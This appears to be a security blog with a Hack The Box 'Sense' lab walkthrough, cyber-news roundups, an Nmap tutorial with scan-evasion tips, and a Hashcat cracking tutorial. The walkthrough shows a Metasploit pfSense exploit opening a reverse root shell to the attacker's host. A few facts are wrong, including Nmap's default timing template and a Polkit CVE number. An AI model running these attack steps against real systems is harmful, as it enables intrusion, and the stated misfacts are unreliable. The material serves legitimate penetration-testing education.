10/07/2024

HTB: Sense

 ___  ___  _________  ________                         
|\  \|\  \|\___   ___\\   __  \  ___                   
\ \  \\\  \|___ \  \_\ \  \|\ /_|\__\                  
 \ \   __  \   \ \  \ \ \   __  \|__|                  
  \ \  \ \  \   \ \  \ \ \  \|\  \  ___                
   \ \__\ \__\   \ \__\ \ \_______\|\__\               
    \|__|\|__|    \|__|  \|_______|\|__|               
 ________  _______   ________   ________  _______      
|\   ____\|\  ___ \ |\   ___  \|\   ____\|\  ___ \     
\ \  \___|\ \   __/|\ \  \\ \  \ \  \___|\ \   __/|    
 \ \_____  \ \  \_|/_\ \  \\ \  \ \_____  \ \  \_|/__  
  \|____|\  \ \  \_|\ \ \  \\ \  \|____|\  \ \  \_|\ \ 
    ____\_\  \ \_______\ \__\\ \__\____\_\  \ \_______\
   |\_________\|_______|\|__| \|__|\_________\|_______|
   \|_________|                   \|_________|         
                                                            

Hack The Box's Sense is an Easy OpenBSD machine that features pfSense, an open-source firewall distribution. The path to root is basic directory brute-forcing with Gobuster to find a text file containing user credentials, which grant access to the firewall's web interface, followed by an injection attack that requires that authentication to gain root on the machine.

Once you have started the machine on HTB and connected to your HTB VPN, open a terminal and ping the machine's IP address to confirm the network path is up. Make sure the IP address you enter matches the one HTB displays when you boot the target machine.

ping 10.10.10.60

You should receive replies from the IP address; press CTRL + C to stop sending packets to the target host. Once the network is confirmed up, move on to enumeration with Nmap.

Start by doing a quick service scan using Nmap. We will use the -sV switch to enable version detection. You can learn more about Nmap here.

nmap -sV 10.10.10.60
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-02 11:17 CDT
Nmap scan report for 10.10.10.60
Host is up (0.0091s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT    STATE SERVICE    VERSION
80/tcp  open  http       lighttpd 1.4.35
443/tcp open  ssl/https?

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.98 seconds

We can see a web server running. Navigate to the site by entering the target's IP address in a web browser. The page is a login form for pfSense, an open-source firewall distribution based on FreeBSD. A quick Google search for pfSense's default credentials gives the username "admin" and the password "pfsense". Trying them, we are told they are incorrect. Let's move on to Gobuster to brute-force directories on the server, searching for .php and .txt files with the directory-list-2.3-medium.txt wordlist (-k skips TLS certificate verification):

gobuster dir -u https://10.10.10.60/ -t 50 -x php,txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://10.10.10.60/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 6690]
/help.php             (Status: 200) [Size: 6689]
/themes               (Status: 301) [Size: 0] [--> https://10.10.10.60/themes/]
/stats.php            (Status: 200) [Size: 6690]
/css                  (Status: 301) [Size: 0] [--> https://10.10.10.60/css/]
/edit.php             (Status: 200) [Size: 6689]
/includes             (Status: 301) [Size: 0] [--> https://10.10.10.60/includes/]
/license.php          (Status: 200) [Size: 6692]
/system.php           (Status: 200) [Size: 6691]
/status.php           (Status: 200) [Size: 6691]
/javascript           (Status: 301) [Size: 0] [--> https://10.10.10.60/javascript/]
/changelog.txt        (Status: 200) [Size: 271]
/classes              (Status: 301) [Size: 0] [--> https://10.10.10.60/classes/]
/exec.php             (Status: 200) [Size: 6689]
/widgets              (Status: 301) [Size: 0] [--> https://10.10.10.60/widgets/]
/graph.php            (Status: 200) [Size: 6690]
/tree                 (Status: 301) [Size: 0] [--> https://10.10.10.60/tree/]
/wizard.php           (Status: 200) [Size: 6691]
/shortcuts            (Status: 301) [Size: 0] [--> https://10.10.10.60/shortcuts/]
/pkg.php              (Status: 200) [Size: 6688]
/installer            (Status: 301) [Size: 0] [--> https://10.10.10.60/installer/]
/wizards              (Status: 301) [Size: 0] [--> https://10.10.10.60/wizards/]
/xmlrpc.php           (Status: 200) [Size: 384]
/reboot.php           (Status: 200) [Size: 6691]
/interfaces.php       (Status: 200) [Size: 6695]
/csrf                 (Status: 301) [Size: 0] [--> https://10.10.10.60/csrf/]
/system-users.txt     (Status: 200) [Size: 106]
/filebrowser          (Status: 301) [Size: 0] [--> https://10.10.10.60/filebrowser/]

After some time we notice /system-users.txt in the output above. This file is interesting because it may contain user login information. We can view it by navigating to the path on the web server in a browser; on my spawned HTB machine that is https://10.10.10.60/system-users.txt. We get the following page, a support ticket containing credentials:

####Support ticket###

Please create the following user


username: Rohit
password: company defaults

We see the username listed as "Rohit" and the password as "company defaults". Testing these credentials on the pfSense login page, we are not granted access. But let's try the username with the default pfSense password, "pfsense". With these credentials we are granted access!
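From the defender's side, the wordlist scan above is easy to spot in the web server's access log. The following is an added example (not part of the original write-up, and not Gobuster's or pfSense's code): it parses Common Log Format lines, which lighttpd can be configured to write, and flags any client that accumulates a threshold of 404 responses inside a sliding time window. All log lines, IPs, paths and timestamps are constructed for the demo.

```python
"""Flag directory brute-forcing in web-server access logs (added example)."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Common Log Format: host ident user [time] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)$'
)
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"

_GUESSES = ["admin", "backup", "test", "old", "dev", "config",
            "login2", "tmp", "private", "upload", "api", "secret"]

SAMPLE_LOG = (
    # constructed: one client guessing twelve paths in twelve seconds
    ['10.10.14.6 - - [02/Oct/2024:11:30:%02d -0500] "GET /%s.php HTTP/1.1" 404 345'
     % (i, w) for i, w in enumerate(_GUESSES)]
    # constructed: an ordinary user browsing normally
    + ['192.0.2.10 - - [02/Oct/2024:11:30:05 -0500] "GET /index.php HTTP/1.1" 200 6690',
       '192.0.2.10 - - [02/Oct/2024:11:30:07 -0500] "GET /css/login.css HTTP/1.1" 200 1200',
       # constructed: a single stray 404, well under the threshold
       '192.0.2.20 - - [02/Oct/2024:11:31:40 -0500] "GET /favicon.ico HTTP/1.1" 404 345',
       # constructed: a malformed line the parser must skip rather than crash on
       'garbage line that does not match the format']
)


def parse_line(line):
    """Return a dict for a well-formed CLF line, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ip": m.group("ip"),
            "time": datetime.strptime(m.group("time"), TIME_FMT),
            "path": m.group("path"),
            "status": int(m.group("status"))}


def detect_bruteforce(lines, threshold=10, window=timedelta(seconds=60)):
    """Return {client_ip: time_of_first_alert} for clients that produced at
    least `threshold` 404 responses inside any span of length `window`."""
    recent = defaultdict(deque)   # client -> timestamps of its 404s still in the window
    alerts = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["status"] != 404:
            continue
        q = recent[rec["ip"]]
        q.append(rec["time"])
        while q and rec["time"] - q[0] > window:   # drop 404s that aged out of the window
            q.popleft()
        if len(q) >= threshold and rec["ip"] not in alerts:
            alerts[rec["ip"]] = rec["time"]
    return alerts


if __name__ == "__main__":
    for ip, when in detect_bruteforce(SAMPLE_LOG).items():
        print("possible directory brute-force from %s starting %s" % (ip, when.isoformat()))
```

The threshold and window are tuning knobs; ten misses in a minute is far above what a human produces but well below what a 50-thread wordlist run generates. Note also that a 404-only rule is incomplete against an application like pfSense, which answers most unauthenticated .php requests with the login page (the near-identical sizes in the Gobuster output above): counting distinct requested paths per client, regardless of status code, is the complementary rule.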

Let's fire up Metasploit and search for pfSense exploit modules:

msfconsole
Metasploit tip: To save all commands executed since start up to a file, use the 
makerc command
                                                  
 _                                                    _
/ \    /\         __                         _   __  /_/ __
| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_
      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\


       =[ metasploit v6.3.44-dev                          ]
+ -- --=[ 2376 exploits - 1232 auxiliary - 416 post       ]
+ -- --=[ 1391 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

[msf](Jobs:0 Agents:0) >> search pfsense

Matching Modules
================

   #  Name                                            Disclosure Date  Rank       Check  Description
   -  ----                                            ---------------  ----       -----  -----------
   0  exploit/unix/http/pfsense_clickjacking          2017-11-21       normal     No     Clickjacking Vulnerability In CSRF Error Page pfSense
   1  exploit/unix/http/pfsense_diag_routes_webshell  2022-02-23       excellent  Yes    pfSense Diag Routes Web Shell Upload
   2  exploit/unix/http/pfsense_config_data_exec      2023-03-18       excellent  Yes    pfSense Restore RRD Data Command Injection
   3  exploit/unix/http/pfsense_graph_injection_exec  2016-04-18       excellent  No     pfSense authenticated graph status RCE
   4  exploit/unix/http/pfsense_group_member_exec     2017-11-06       excellent  Yes    pfSense authenticated group member RCE
   5  exploit/unix/http/pfsense_pfblockerng_webshell  2022-09-05       great      Yes    pfSense plugin pfBlockerNG unauthenticated RCE as root


Interact with a module by name or index. For example info 5, use 5 or use exploit/unix/http/pfsense_pfblockerng_webshell

[msf](Jobs:0 Agents:0) >> 

We see that option #3 is an injection attack module that requires authentication, which we now have. You can read more about this specific exploit on Rapid7's website here. Let's select this module and fill in the required options:

use 3
[*] Using configured payload php/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> options

Module options (exploit/unix/http/pfsense_graph_injection_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  pfsense          yes       Password to login with
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit
                                        /basics/using-metasploit.html
   RPORT     443              yes       The target port (TCP)
   SSL       true             no        Negotiate SSL/TLS for outgoing connections
   USERNAME  admin            yes       User to login with
   VHOST                      no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target



View the full module info with the info, or info -d command.

[msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> set RHOSTS 10.10.10.60
RHOSTS => 10.10.10.60
[msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> set USERNAME rohit
USERNAME => rohit
[msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> set LHOST tun0
LHOST => 10.10.14.6
[msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> 

We set RHOSTS to the target IP address, USERNAME to "rohit", and LHOST to the interface (tun0) whose address will receive the reverse TCP connection. We can now run the module with "exploit":

exploit

[*] Started reverse TCP handler on 10.10.14.6:4444 
[*] Detected pfSense 2.1.3-RELEASE, uploading intial payload
[*] Payload uploaded successfully, executing
[*] Sending stage (39927 bytes) to 10.10.10.60
[+] Deleted uz
[*] Meterpreter session 1 opened (10.10.14.6:4444 -> 10.10.10.60:53021) at 2024-10-02 12:06:53 -0500

(Meterpreter 1)(/var/db/rrd) > getuid
Server username: root
(Meterpreter 1)(/var/db/rrd) > 

Once the reverse TCP connection is established, the "getuid" command shows we now have root access to the machine! You can now navigate the target system to obtain the user and root .txt flags.

10/04/2024

CyberChannel: Week of 9/29/24

CUPS Vulnerability Could Amplify DDoS Attacks by 600 Times

A recently patched vulnerability in the Common Unix Printing System (CUPS) has emerged as a potential tool for cyber criminals. This flaw can be exploited to launch Distributed Denial-of-Service (DDoS) attacks with a significant amplification factor of 600 times. This means attackers can use a small amount of traffic to overwhelm a targeted server with a much larger volume, making it inaccessible to legitimate users.

Researchers discovered that chaining this CUPS flaw with three other vulnerabilities could potentially allow remote code execution on Unix-like systems. However, the primary concern lies in its DDoS amplification capabilities. Thankfully, patches are available to address this issue. System administrators are urged to update their CUPS installations to mitigate the risk and prevent their servers from being used in DDoS attacks.

"Pig Butchering" Apps Preying on App Store Users

"Pig butchering" scams have been discovered on both the Google Play Store and Apple's App Store. These fraudulent trading apps lure victims with promises of high returns on fake cryptocurrencies. Once users invest, their funds are stolen by the scammers. It's important to be cautious when downloading investment apps and to research the developer and user reviews before investing any money.

To avoid falling victim to these scams, users should be wary of unsolicited investment offers. It's also important to verify the legitimacy of the trading platform and the cryptocurrency before investing. Additionally, users should never share their personal or financial information with strangers.

Cloudflare Blocks 3.8 Tbps DDoS Attack, Setting New Record

Cloudflare, a web security company, recently thwarted a record-breaking distributed denial-of-service (DDoS) attack. The attack peaked at a staggering 3.8 terabits per second (Tbps) and lasted for 65 seconds. The attackers launched the attack by exploiting a network of vulnerable devices, including Asus routers and Mikrotik systems. This attack is the largest publicly recorded DDoS attack ever observed.

In comparison to previous large-scale DDoS attacks, this attack stands out due to its volume and duration. DDoS attacks work by overwhelming a target server with traffic, making it unavailable to legitimate users.

Evasive Linux Malware Enables Widespread Cryptomining

A stealthy malware campaign targeting Linux servers for years has finally come to light. The malware, dubbed "perfctl," has likely infected millions of servers and caused significant disruption. Researchers believe perfctl has been active for at least three years, exploiting vulnerabilities in Polkit (CVE-2021-4043) to escalate privileges and install cryptomining software.

Perfctl is particularly dangerous due to its evasive tactics. It avoids detection by stopping its activities when a new user logs in, only resuming once the user becomes idle again. Additionally, it deletes its own binary after execution, further enhancing its stealth. This highlights the importance of keeping systems updated and implementing strong security measures to protect against evolving cyber threats like perfctl.

FIN7 Targets Users with Deepfake Nude Generators to Spread Malware

FIN7 hackers are using a new tactic to spread malware. FIN7 is a cybercrime group known for sophisticated phishing and social engineering attacks. In this new campaign, FIN7 is creating fake AI-powered deepnude generator sites. These sites are designed to lure people interested in generating nude images using deepfakes. When users try to download the generated images, they are unknowingly downloading malware instead.

This is not the first time FIN7 has used social engineering to spread malware. FIN7 has been distributing NetSupport RAT and other malware through similar tactics. NetSupport RAT is a remote access trojan that allows attackers to take control of infected devices.

UMC Health System Impacted by Ransomware, Patients Diverted

The UMC Health System in Texas was recently impacted by a ransomware attack. This disrupted their IT infrastructure, forcing them to take critical measures to contain the incident. While their facilities remained open, some emergency and non-emergency patients had to be diverted to other locations.

UMC took immediate action to disconnect their systems and launched an investigation. As of now, no major ransomware group has claimed responsibility for the attack. This incident highlights the potential consequences of cyberattacks on critical infrastructure like healthcare systems. The disruption caused by the attack emphasizes the importance of robust cybersecurity measures in protecting patient care and hospital operations.

LockBit Ransomware Gang Hit with Global Crackdown

In a global effort to crack down on the LockBit ransomware gang, law enforcement agencies from twelve countries have joined forces. This resulted in the arrest of four individuals connected to the cyber criminal group. Those arrested included a developer, a bulletproof hosting service administrator, and two others associated with LockBit activity.

The operation not only involved arrests but also the seizure of LockBit infrastructure and the release of a decryption tool. This tool allows victims to recover their encrypted files for free. Additionally, authorities issued indictments targeting other LockBit affiliates and offered a substantial reward for information leading to the capture of the gang's leadership. These actions demonstrate international cooperation in combating ransomware threats and potentially offer relief to victims of LockBit attacks.

Hacker Steals Confidential Data for Profit

A British citizen, Robert B. Westbrook, has been charged by the U.S. Securities and Exchange Commission (SEC) for hacking into the computer systems of five public American companies. His goal was to access confidential earnings information before it was made public.

Westbrook allegedly used this stolen information to make profitable stock trades ahead of earnings announcements. Over a period of 18 months, between January 2019 and August 2020, he made an estimated $3.75 million in illegal profits through insider trading. The SEC alleges that Westbrook reset the passwords of senior executives to gain access to documents and emails containing financial reports. He then used anonymous email accounts, VPN services, and Bitcoin to conceal his identity while making the illicit investments. However, the SEC was eventually able to track him down using data analytics.

9/30/2024

Nmap Basics for Penetration Testing

          ___.-------.___
      _.-' ___.--;--.___ `-._
   .-' _.-'  /  .+.  \  `-._ `-.
 .' .-'      |-|-o-|-|      `-. `.
(_ <O__      \  `+'  /      __O> _)
  `--._``-..__`._|_.'__..-''_.--'
        ``--._________.--''

Nmap, short for Network Mapper, is a free and open-source tool widely used for network discovery and security auditing. Nmap utilizes raw IP packets in innovative ways to gather information about a network. It can identify available hosts, running services (including application name and version), operating systems, firewalls or packet filters in use, and many other details. Designed for rapid scanning of large networks, Nmap also works effectively for single hosts.

Network administrators rely on Nmap for tasks such as creating network inventories, managing service upgrades, and monitoring host and service uptime, while hackers use it for enumeration, i.e., identifying open ports and the services running on them that may be exploitable.

Nmap is available for most operating systems and is included with the Kali Linux distribution. Remember to replace the placeholder IP address with your target's IP address. You can also test against the host name scanme.nmap.org, which the Nmap project provides for this purpose. Let's start with a basic scan; we can scan an IP address or a host name such as scanme.nmap.org:

nmap 192.168.1.1

We can also scan a list of network/host targets from a text file using the following command, where "ip_list.txt" is the path to the file.

nmap -iL ip_list.txt 

When performing a penetration test on a network, we may want to perform a ping sweep, which sends ICMP echo requests to every address in a range and returns the hosts that reply. A ping sweep is a crucial step in identifying active hosts on a network and lays the groundwork for the rest of the test.

nmap -sn 192.168.0.0/24

Once we have the list of live hosts, we can port-scan them individually. Note the "/24" suffix on the IP address: it sets the address range, so Nmap sends an ICMP echo request to every IP address in the network from 192.168.0.1 to 192.168.0.255.

Nmap defaults to scanning the 1000 most commonly used ports. Port specification and scan order refer to the process of selecting which ports to scan during network reconnaissance. This is crucial for efficient scanning as it allows you to exclude irrelevant ports and prioritize the scan based on port usage frequency.

We can specify ports using the following command:

nmap -p 22,80,443 192.168.1.1

We can also detect the operating system. This information helps pinpoint vulnerabilities specific to that OS, enabling more effective attacks on the target system. Use "-O" to enable OS detection.

nmap -O 192.168.1.1

What if we want to detect the services being run on open ports on the network? The service/version detection feature in Nmap provides valuable insights into the target system, enabling you to identify vulnerabilities and weaknesses on those ports. This option can be enabled by using "-sV".

nmap -sV 192.168.1.1

With the returned version information, we can query a tool such as searchsploit for possible exploits affecting these services.

One of the most popular scans is the SYN scan. It sends a SYN packet to each target port and watches the response: a SYN/ACK reply means the port is open, and an RST reply means it is closed. Because this half-open technique never completes the full TCP three-way handshake, it is fast and, most importantly, stealthy, which makes it ideal for mapping large networks.

nmap -sS 192.168.1.1
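To make the open/closed/filtered decision concrete, here is an added example (not from the original post and not Nmap's own code) that parses the 20-byte fixed TCP header with struct, reads the flag bits, and applies the rule stated above: SYN/ACK means open, RST means closed, and no reply at all means filtered. The reply packets are constructed byte strings, not captured traffic; the probe port 40000 and sequence number 0x1000 are arbitrary.

```python
"""Classify a port from the reply to a SYN probe, the logic behind nmap -sS (added example)."""
import struct

# TCP flag bits (RFC 9293), in the low byte of the data-offset/flags field
FIN, SYN, RST, PSH, ACK = 0x01, 0x02, 0x04, 0x08, 0x10

TCP_FMT = "!HHIIHHHH"   # sport, dport, seq, ack, offset+flags, window, checksum, urgent


def build_tcp_header(sport, dport, seq, ack, flags):
    """Build a minimal 20-byte TCP header; the checksum is left at 0 for the demo."""
    offset_flags = (5 << 12) | flags          # data offset = 5 words (no options), then flags
    return struct.pack(TCP_FMT, sport, dport, seq, ack, offset_flags, 65535, 0, 0)


def parse_tcp_header(data):
    """Decode the fixed part of a TCP header into a dict."""
    if len(data) < 20:
        raise ValueError("truncated TCP header")
    sport, dport, seq, ack, offset_flags, win, _csum, _urg = struct.unpack(TCP_FMT, data[:20])
    return {"sport": sport, "dport": dport, "seq": seq, "ack": ack,
            "flags": offset_flags & 0x01FF, "window": win}


def classify_port(reply, probe_port, probe_seq):
    """reply: raw TCP header bytes from the target, or None if nothing came back
    before the timeout. probe_port/probe_seq identify the SYN we sent."""
    if reply is None:
        return "filtered"        # no answer: dropped by a firewall, or the host is silent
    hdr = parse_tcp_header(reply)
    if hdr["sport"] != probe_port:
        return "unrelated"       # not a reply to our probe
    f = hdr["flags"]
    if f & RST:
        return "closed"          # RST (normally RST/ACK): nothing is listening
    if f & SYN and f & ACK and hdr["ack"] == probe_seq + 1:
        return "open"            # step two of the handshake; a SYN scanner answers with RST
    return "unexpected"


def demo():
    """Three constructed replies: an open port, a closed port, and a silent one."""
    probe_seq = 0x1000
    replies = {
        22: build_tcp_header(22, 40000, 0xABCD, probe_seq + 1, SYN | ACK),  # constructed
        23: build_tcp_header(23, 40000, 0, probe_seq + 1, RST | ACK),       # constructed
        25: None,                                                           # no reply
    }
    return {port: classify_port(r, port, probe_seq) for port, r in replies.items()}


if __name__ == "__main__":
    for port, state in demo().items():
        print("%d/tcp %s" % (port, state))
```

One caveat worth keeping in mind when relying on the scan's stealth: the half-open technique keeps the target application from ever seeing (and logging) a completed connection, but the SYN and the scanner's answering RST are still on the wire, so a network IDS or a firewall that counts SYNs per source sees the scan just as clearly as a full connect scan.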

Being stealthy is an important part of penetration testing. Some firewalls and Intrusion Detection System (IDS) solutions may temporarily block IP addresses that exhibit unusual network activity, such as high traffic volumes or packets sent to many hosts in a systematic pattern. We can reduce this risk with options that affect the scan's order and timing.

The "-T" option selects the scan's timing template. By default, Nmap uses the "-T2" timing template, but we can slow the scan down with "-T1" or "-T0". These slow the scan but minimize the impact on the network and help avoid triggering alerts.

nmap -T1 192.168.0.0/24

You can also slow an Nmap scan with a fixed delay between probes. Use the "--scan-delay" option and specify the desired delay, for example in seconds.

nmap --scan-delay 3s 192.168.0.0/24

We can also change the order in which targets are scanned. Nmap's --randomize-hosts option shuffles the target order, making the scan less predictable and harder for security monitoring to detect.

nmap --randomize-hosts 192.168.0.0/24

One of Nmap's most powerful features is its ability to run scripts. The Nmap Scripting Engine (NSE) runs scripts written in the Lua programming language.

For example, the following command runs the "http-headers" script, which retrieves the HTTP headers the target web server returns.

nmap --script http-headers scanme.nmap.org

As a penetration tester, you may want to run the "vulners" script which automatically lists the vulnerabilities on a target using a CVE database.

nmap --script vulners 192.168.1.1

There are hundreds of NSE scripts available which you can view here.

9/27/2024

CyberChannel: Week of 9/22/24

Telegram's Privacy Policy Shift Raises Concerns

Telegram has updated its privacy policy to share user IP addresses and phone numbers with law enforcement upon receiving a valid court order. This change marks a significant departure from Telegram's previous stance, which only allowed for the disclosure of such information in cases involving terrorism suspects. This comes a month after the arrest and indictment of Pavel Durov, Telegram's co-founder.

The new policy expands the scope of data sharing to include situations where users are suspected of violating Telegram's Terms of Service. This could potentially include activities such as spreading hate speech, promoting illegal content, or engaging in other harmful behaviors. Telegram has emphasized that it will continue to fight for user privacy and only disclose information when legally required.

However, the new policy has raised concerns among privacy advocates. Some argue that it could lead to increased surveillance of users and make it easier for governments to track their activities. Others worry that the change could make Telegram less attractive to users who value privacy.

Kaspersky's Forced Removal and Replacement Raises Questions

In response to a US government ban, Kaspersky has taken the drastic step of deleting its antivirus software from US customers' computers. This unexpected move has left many users confused and concerned about their security.

Instead of simply removing its software, Kaspersky has replaced it with UltraAV, another antivirus product. The move is likely a direct consequence of the US government's decision to ban Kaspersky products from federal government networks due to concerns about potential ties to the Russian government. While Kaspersky has repeatedly denied any such connections, the ban has had a significant impact on the company's business.

Kia Dealer Portal Flaw Poses Serious Security Risk

A serious vulnerability has been discovered in Kia's dealer portal, which could potentially allow attackers to remotely exploit millions of Kia vehicles. The flaw could provide unauthorized access to critical car functions, posing a significant safety risk. The flaw also exposed sensitive personal information of car owners, including their name, phone number, email address, and physical address, potentially enabling attackers to register themselves as secondary users on the affected vehicles.

The vulnerability could be exploited to remotely unlock doors, start engines, or even control other vehicle systems. This could have serious consequences for both car owners and the general public. Kia has acknowledged the issue and is working on a patch to address the vulnerability.

Cyberattack Forces Kansas Water Plant to Manual Operations

A cyberattack on a Kansas water treatment facility has forced them to switch to manual operations, highlighting the growing concern about cyber threats targeting critical infrastructure.

The attack disrupted the facility's computer systems, making it impossible for operators to monitor and control the water treatment process. As a result, the facility was forced to revert to manual procedures, which are more time-consuming and prone to errors.

This incident underscores the importance of protecting critical infrastructure from cyberattacks. A successful attack on a water treatment facility could have serious consequences for public health and safety.

Islamophobic Cyberattack Disrupts UK Railway Stations

A cyber security incident targeting passengers at several key railway stations in the UK has resulted in an arrest. The incident involved displaying Islamophobic messages on the Wi-Fi login pages of stations like Manchester Piccadilly, Birmingham New Street, and several London terminals.

The culprit, identified as an employee of Global Reach Technology, a company providing Wi-Fi services to Network Rail, was apprehended based on suspicion of offenses under the Computer Misuse Act 1990 and the Malicious Communications Act 1988. Thankfully, no passenger data was compromised during the attack.

Android Malware Necro Infects Millions of Devices

A new Android malware called Necro has infected over 11 million devices through the Google Play Store via malicious advertising SDKs used by seemingly legitimate apps, Android game mods, and altered versions of popular software such as Spotify, WhatsApp, and Minecraft. Necro can steal sensitive information, such as login credentials and credit card details. It can also install other malware on infected devices. The malware was able to bypass Google Play's security measures and infect a large number of devices.

This incident serves as a reminder that users should be cautious about downloading apps from the Google Play Store. It is important to only download apps from trusted developers and to be aware of the potential risks associated with installing apps from unknown sources.

Romcom Malware Resurfaces with New Variant

A resurgence of "Romcom" malware has been observed, using a variant of the Snipbot banking trojan. This highlights the ongoing threat of malware targeting online banking credentials and the need for robust security measures when conducting financial transactions online.

"Romcom" malware is a family of malicious software that targets online banking customers. The malware is designed to steal login credentials and other sensitive information. It can also be used to transfer funds to unauthorized accounts.

The Snipbot banking trojan is known for its ability to evade detection by security software. The malware is being distributed through email attachments and malicious websites.

P. Diddy Gossip Used to Spread Malicious Software

A sophisticated remote access trojan (RAT) named "PdiddySploit" has been targeting victims using the celebrity gossip surrounding the arrest of P. Diddy. The RAT is designed to give attackers complete control over infected devices. It can be used to steal sensitive information, spy on victims, and launch further attacks. The attackers behind "PdiddySploit" are using a variety of social engineering tactics to lure victims into clicking on malicious links or downloading infected files.

These tactics include sending emails that appear to be from celebrities or news organizations. The emails often contain sensational headlines or offers of exclusive content. Once victims click on the malicious link or download the infected file, their devices are compromised.

9/24/2024

Password Cracking With Hashcat

 _._     _,-'""`-._
(,-.`._,'(       |\`-/|
    `-.-' \ )-`( , x x)
          `-    \`_`"'-

Hashcat is a command-line password cracking tool supporting over 300 hashing algorithms. It offers five attack modes, including brute-force and dictionary attacks. We will focus on dictionary attacks, a simpler and faster mode that hashes each entry of a wordlist and compares it with the target hash, rather than brute-force, which can consume large amounts of time and computing resources because it tries combinations of characters through trial and error.

We will be using the rockyou.txt password list. This password list was compiled back in 2009 after a major data breach at RockYou, a social media app and advertising network. The list contains over 14 million unique passwords that are commonly used amongst the general public and is a staple wordlist in the hacker community. You can view and download other password lists from here.

Passwords are usually discovered as hashes. Password hashing is the practice of algorithmically turning a plain-text password into a fixed-length digest, an irreversibly obfuscated version of itself, as a defense against password breaches; it keeps the passwords from being read directly. There are many hashing algorithms, including MD5, SHA-1, SHA-256, and hundreds of others. As mentioned earlier, Hashcat can crack over 300 different hash types. Below is a collection of downloadable hashed passwords for practice with Hashcat and the rockyou.txt password list. You can also hash your own passwords using online resources such as the All Hash Generator on Browserling.com.

Hashed Password Samples:
MD5Password.txt
SHA1Password.txt
SHA256Password.txt
CRC32Password.txt
NTLMPassword.txt

Hashcat is available for various operating systems and is included in the Kali Linux distribution. We can crack the first MD5 hashed password from the samples above with the following command in our terminal:

hashcat -m 0 *path to MD5Password.txt* *path to rockyou.txt*

The first option of the command, "-m 0", sets the type of hash you are attempting to crack, 0 being MD5. You can view all the hashing algorithms Hashcat supports and their mode numbers using the command "hashcat --help". For example, 100 is used for SHA-1 hashes. If you do not know the hashing algorithm used for the password you are attempting to crack, you can use a hash identifying tool like hash-identifier, which is included in Kali Linux distros.

The second option, "*path to MD5Password.txt*", points Hashcat to the hashed password file. For example /home/USERNAME/Downloads/MD5Password.txt, where USERNAME is your username. The final option of the command is the path to the wordlist you are running the attack with. Kali Linux includes many default wordlists, including rockyou.txt, under /usr/share/wordlists. Please note that rockyou.txt ships compressed as rockyou.txt.gz, so you will need to decompress it with the gunzip command if you haven't already.

Let's run the command and see what Hashcat comes up with:

hashcat -m 0 /root/Downloads/MD5Password.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-haswell-AMD Ryzen 5 4600H with Radeon Graphics, 1425/2914 MB (512 MB allocatable), 2MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

6104df369888589d6dbea304b59a32d4:blink182                 
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: 6104df369888589d6dbea304b59a32d4
Time.Started.....: Tue Sep 24 15:54:28 2024 (0 secs)
Time.Estimated...: Tue Sep 24 15:54:28 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
